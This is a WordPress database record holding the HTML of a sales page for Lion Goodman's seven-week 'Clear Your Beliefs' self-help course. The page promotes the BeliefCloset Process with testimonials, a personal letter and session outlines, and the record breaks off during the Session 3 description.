(917, 4194, '2014-06-17 13:37:31', '2014-06-17 18:37:31', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt">Delete Blocks &amp; Limitations</h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt">Allow More Success &amp; Joy</h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt">Simply CLEAR Your Beliefs!</h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />&nbsp;\r\n\r\n<span style="color: #ff0000;"><strong>Your "limitations" were createdby your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img 